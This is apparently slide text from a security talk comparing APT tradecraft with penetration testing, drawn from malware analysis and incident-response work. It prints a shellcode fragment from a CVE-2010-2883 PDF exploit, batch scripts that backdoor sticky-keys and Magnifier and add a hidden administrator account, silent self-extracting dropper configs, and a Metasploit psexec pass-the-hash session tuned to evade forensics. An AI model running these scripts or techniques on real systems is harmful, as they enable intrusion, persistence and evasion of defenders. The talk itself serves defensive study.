Evolution of PenTesting

Evolution of PenTesting
1
Introduction
• Name: Russ Gideon
• Title: Director of Malware Research
• Contact: rgideon@attackresearch.com
• Twitter: @gideonsecurity
• Background:
– Led numerous Red Teams
– Foreign attack profiling and reverse engineering
– Recent work in integration of malware and attack profiling
attributes in Attack Research penetration testing
2
Evolution
• What is this talk?
– A dissection of real world attacks and some of its
affects on penetration testing.
– Reflection on real offensive operators vs
penetration testers
– Conclusions are derived from mainly a
forensics/binary analysis perspective
• What this talk is not!
– A slam on current penetration testing tools!
3
Evolution
• 1960s discussions about Time Sharing
computers being vulnerable
– RAND Corporation
– NSA
• Coined the term “penetration” for this
• Evolved into Tiger Teams
• From a historical perspective influential
people in this
– Willis Ware
4
The Birth Of an Industry
Industry realized we need to
behave like attackers to learn
how to defend against them
Henceforth the industry we
all know and love is born
5
Evolution Of an Industry
• Industry gets bigger
• Tools become a commodity
• Attackers evolved and changed tactics
– Employed varying degrees of malware
– Deception
– Leverage protocol and design flaws
– Evasion and anti-analysis techniques
• The industry tools also evolved, but not in the
same manner
6
Memory corruption == $$$
• Tools become commodity
• The shift begins
• Attackers are closed source and don’t release
7
We Make Strange Bedfellows
8
Offensive Operators
9
Why do we call it APT?
• “APT” != Advanced
• Clever != Advanced
• Attackers work as hard as they have to but not
any harder
– As we step up the defense game they have to
work harder
– Currently that game is not too difficult (in most
places)
10
Outline
• Getting In
• APT Lateral Movement vs Pentesters Lateral
Movement
• Staging The Attack
11
Getting In – Spear Phishing
12
Getting In
• Example
– CVE 2010-2883
• Stack-based buffer overflow in CoolType.dll
• Very popular for targeted spear phishing
• 22 unique samples with this exploit in them
– 7 of these samples are made with metasploit’s module for this
– Case study
• Targeted Attack With a PDF
– D4169301AFBC86A04135EBC4A6A4BAD.pdf
13
Getting In
• Metasploit has a great module for 2010-2883
• If a host isn’t vulnerable then it will drop and
open a clean “Hello World” PDF
14
Getting In
• D4169301AFBC86A04135EBC4A6A4BADB.pdf
• Includes this data stream
• Look familiar?
15
Getting In
• The shellcode is the only significant difference
between the “APT” sample and a general
metasploit created PDF
16
Getting In
WjozzFaiSj = unescape
var nXzaRHPbywaqAbGpGx0t0zGkvQWhu =
“\x25\x754141\x25\x754141%63a5%u4a80\0x25
snip….. 0x75fa65%uec10%u0937%ufb0c%ufd97…….snip
…%ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uae
f2"
17
Using MSF DEP/ASLR Bypass
MSF Created PDF
seg000:00000136
seg000:00000137
seg000:00000138
seg000:00000139
seg000:0000013A
seg000:0000013B
seg000:0000013C
seg000:0000013D
seg000:0000013E
seg000:0000013F
seg000:00000140
seg000:00000141
seg000:00000142
seg000:00000143
seg000:00000144
seg000:00000145
seg000:00000146
seg000:00000147
seg000:00000148
seg000:00000149
seg000:0000014A
seg000:0000014B
db 84h
db 4Ah ;
db 92h ;
db 0B6h
db 80h ;
db 4Ah
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0
db 10h
db 0
db 0
APT Created PDF with MSF
seg000:00000136
seg000:00000137
seg000:00000138
seg000:00000139
seg000:0000013A
seg000:0000013B
seg000:0000013C
seg000:0000013D
seg000:0000013E
seg000:0000013F
seg000:00000140
seg000:00000141
seg000:00000142
seg000:00000143
seg000:00000144
seg000:00000145
seg000:00000146
seg000:00000147
seg000:00000148
seg000:00000149
seg000:0000014A
seg000:0000014B
db 84h
db 4Ah ;
db 92h ;
db 0B6h
db 80h ;
db 4Ah
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0FFh
db 0
db 10h
db 0
db 0
18
Side Note
• The original sample from contagio
– Dropper is igfxver.exe
– AV family of Chifrax
• D4169301AFBC86A04135EBC4A6A4BAD
B.pdf
– Dropper is AcroRd32.exe in temp
– %TEMP%\AcroRd32.exe drops and starts
• rundll32.exe
"C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11
– AV Family of Protux
– Delivered ~2 weeks later
19
Getting In Conclusion
• Pen Tester: SingTable CoolType DLL Overflow
MSF Module with PDF dropper.
– Not a white hat based disclosure
– Originally found in a targeted campaign
• http://contagiodump.blogspot.com/search/label/CVE-2010-2883
• Attacker: Rip off MSF Module
– This attack used the metasploit module
– Change out shellcode
• Added obfuscation
• Verdict: Attacker rips off another attackers
tactic and makes it better
20
Outline
• Getting In
• APT Lateral Movement vs Pen Testers Lateral
Movement
• Staging The Attack
21
Lateral Movement
22
APT Lateral Movement
• Case Study:
a1765a7f3376c76d8c23766a92f1cb6b.exe
– Nps.exe
• Sample from IR we conducted
• In a nutshell their own PSEXEC for shoveling
shells
23
Lateral Movement
• General flow of the sample
– From controlling node
• Execute: nps.exe –install $Victim NPServer
• Drops nps.exe on \\victim\Admin$\system32
• Creates a service around nps.exe (named NPServer) on
remote server and starts it
• Named pipes created on victim host and used for
communications
– NPStdin
– NPStdout
24
Lateral Movment
• Based upon arguments it is a service binary or
drops the communication piece on the remote
host
25
Lateral Movement
• Dropper to the victim
26
Lateral Movement
• Remote Named pipes for all communications
Controlling host
Victim Host
27
Lateral Movement
• Taking advantage of credential authorization
• Of course won’t work in all situations
– Account needs to have administrative privileges
– Vista and up
• Credentials have to be domain based
• Local administrative credentials can’t write to C$ and
Admin$
28
Forensic Evidence
29
Forensic Evidence
30
Pen Testers Forensic Evidence
• Metasploit has the same capability with
PSEXEC
• General flow
– Pushes service executable with payload to
\\victim\Admin$\system32
– Uses DCERPC to create a service around the
service binary on victim host
– Starts the service on the victim
– Uses payload defined variables for communication
31
Pen Testers Forensic Evidence
32
Pen Testers Forensic Evidence
33
Usage
34
Usage
• msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name
Current Setting
Required
Description
----------------------------------RHOST
yes
The target
address
RPORT
445
yes
Set the SMB
service port
SHARE
ADMIN$
yes
The share to
connect to, can be an admin share (ADMIN$,C$,...) or a normal
read/write folder share
SMBDomain WORKGROUP
no
The Windows
domain to use for authentication
SMBPass
no
The password
for the specified username
SMBUser
no
The username
to authenticate as
35
Major Differences!
• NPS.exe usage screen. Shows flexibility to alter
your forensic evidence
• Metasploit doesn’t have this capability
• Derives its service name and display name
from 2 pieces of code in the module
– Service name generation looks like
• servicename = rand_text_alpha(8)
– Display name generation looks like:
• displayname = 'M' + rand_text_alpha(rand(32)+1)
36
Major Differences
• Not Blending in!
– rand_text_alpha(8)
– 'M' + rand_text_alpha(rand(32)+1)
37
Lateral Movement Solution
• A few lines added to the psexec module and
we have some flexibility now
– Register two new options
• SVCName
– The Service name you want to use. This will be what is left
over in the registry under HKLM\CurrentControlSet\services if
the service is not cleaned up
• DisplayName
– This is the display name of the service that will show up in the
event logs
38
Lateral Movement Solution
• psexec_ar options
msf exploit(psexec_ar) > set DisplayName NPServer
msf exploit(psexec_ar) > set RHOST victim
msf exploit(psexec_ar) > set SMBDomain ""
msf exploit(psexec_ar) > set SMBUser Administrator
msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586
msf exploit(psexec_ar) > set SVCName NPServer
msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe
msf exploit(psexec_ar) > set EXE::Custom mycustom.exe
msf exploit(psexec_ar) > exploit
39
Lateral Movement Solution
40
Lateral Movement Solution
Available on GitHub
https://github.com/AttackResearch/Metasploit/blob/master/modules/exploits/psexec_ar.rb
41
Lateral Movement Conclusion
• Pen Tester: MSF Psexec module
– Randomized service names
– Obvious “badness”
– Very loud
• Attacker: Custom psexec type functionality
– Blend in and look normal
– Uses named pipes for communication
– Very basic backdoor that still isn't caught by AV
• Verdict: Superior attacker technique, less likely
to get caught
42
Outline
• Getting In
• APT Lateral Movement vs Pen Testers Lateral
Movement
• Staging The Attack
43
Staging The Attack
44
Staging The Attack
• Automation is the key
• Humans make mistakes
• Automate the post exploitation
– Sounds “advanced” doesn’t it?
45
Why Raise The Bar?
• Found on various C2 hosts and on the victims
– MM.exe
• Simple automation of their attack
– Helps them for speed
– Helps us with being able know how they will
operate in environments next time
• Rar files aren’t just for exfiltration
46
Why Raise The Bar?
• Dissection of mm.exe
– Self executing rar file
– Drops 2.bat and mm.exe in C:\Temp
– C:\Temp\mm.exe isn’t the same as the original
mm.exe
• New mm.exe
• Another UPX packed SFX
– Drops 22.bat and net1.exe in C:\Temp
47
Why Raise The Bar?
• 2.bat
copy %windir%\explorer.exe %windir%\system32\explorer1.exe
copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe
copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe
copy c:\temp\mm.exe %windir%\system32\magnify1.exe
del %windir%\system32\sethc.exe
del %windir%\system32\magnify.exe
c:
cd %windir%\system32\
ren explorer1.exe sethc.exe
ren magnify1.exe magnify.exe
48
Why Raise The Bar?
• 22.bat
c:\temp\net1.exe user syslem$ /active:y
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123
c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add
c:\temp\net1.exe localgroup Administrators syslem$ /add
• Now they have
Persistence
Communications
49
Before and After
50
Why Raise The Bar?
• Build the SFX RAR file
– Rar.exe a -sfxDefault.sfx -zsettings.conf mm2.exe
mm.exe 2.bat
Settings.conf
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=2.bat
51
Why Raise The Bar?
• Build the SFX RAR file
– Rar.exe a -sfxDefault.sfx –zsettings1.conf mm.exe
C:\Windows\System32\net1.exe 22.bat
Settings1.conf
;The comment below contains SFX script commands
Path=C:\Temp\
SavePath
Overwrite=1
Silent=1
Setup=22.bat
52
Staging The Attack Conclusion
• Pen Tester: Possible MSF Module
– There really isn’t a tool comparison
– Make a metasploit module for this?
– Working harder than have to?
• Attacker: Attack Process is Automated
– No need for a complex framework
– Works into attackers tool set
– Leverage system resources and that is it
• Verdict: Attacker technique is simple and
effective. Doesn’t work harder than has to
53
Conclusions
• Every attack (and group/person) has its
characteristics as do pen testers
• The objectives of a pen tester are usually
much different than an nation state operator
or black hat
– Pen tests have a tone of constraints
– Pen testers are there to test for vulnerabilities
• Which is needed
– This is not testing the system as a whole
• How does your system react to a true compromise
54
Conclusions
• Testing the system as whole
– Targeted attacks affect the whole system
– Penetration testing really just looks for
vulnerabilities
• We have corrupted the term “penetration
tests”
– Pen Test = 20K cheap scan and assessment
• Attack Modeling and Simulations aren’t the
same as a our current definition of
penetration tests
55
Attack Simulations and Modeling
• Testing the system as whole:
– Monitoring
– Triage process
– Incident Response process
• Your operations and your vendors
– Business con-ops
– Disaster recovery
• If you pull the plug on your network you are in disaster
recovery!
56
Attack Simulations: Case Study
57
Attack Simulations
• What’s the difference between a fire inspector
and a fireman?
• Fire inspectors are hired to => Inspect
– Exit lights are working
– Fire alarms are working
– Fire extinguishers are up to par
• Fireman are hired to => Respond
– Fires
– Medical emergencies
– Large scale disasters
58
Attack Simulations
• Do not have your incident response capability behave
as fire inspectors
• They are needed to respond not inspect
• We must start training the IR capability
– More than just penetration testing of them
• What are firemen doing while they are “down”?
– Training
• Is your IR team technically capable of handling an
incident
– Revere Engineering
– PCAP Analysis
– Log mining
• Does the business know how to use them
59
Attack Simulations
• You might not be ready for a full stress test of
your environment
• Engage someone that has done this work and
see what they can do.
• More than likely there is a lot they can do
with and for you
– Testing your NOC/IR Ops
– Testing your detection tools/capabilities
– Modeling attacker workflows and how it relates to
your data
60
Questions?
61